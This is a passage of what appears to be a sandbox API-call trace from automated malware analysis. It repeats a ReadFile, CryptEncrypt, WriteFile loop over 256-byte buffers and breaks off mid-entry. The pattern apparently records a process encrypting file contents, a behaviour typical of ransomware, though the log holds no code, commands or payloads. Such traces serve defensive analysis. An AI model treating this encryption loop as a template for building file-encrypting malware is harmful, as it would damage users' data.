0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.253] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.253] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.253] GetLastError () returned 0x0 [0153.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.254] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.254] GetLastError () returned 0x0 [0153.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.254] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.254] GetLastError () returned 0x0 [0153.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.254] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.254] GetLastError () returned 0x0 [0153.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.254] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.254] GetLastError () returned 0x0 [0153.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.254] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.254] GetLastError () returned 0x0 [0153.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.254] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.254] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.254] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.255] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.255] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.255] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.255] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.255] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.255] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.255] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.256] GetLastError () returned 0x0 [0153.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.256] GetLastError () returned 0x0 [0153.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.256] GetLastError () returned 0x0 [0153.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.256] GetLastError () returned 0x0 [0153.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.256] GetLastError () returned 0x0 [0153.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.256] GetLastError () returned 0x0 [0153.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.257] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.257] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.257] GetLastError () returned 0x0 [0153.257] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.258] GetLastError () returned 0x0 [0153.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.258] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.258] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.258] GetLastError () returned 0x0 [0153.258] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 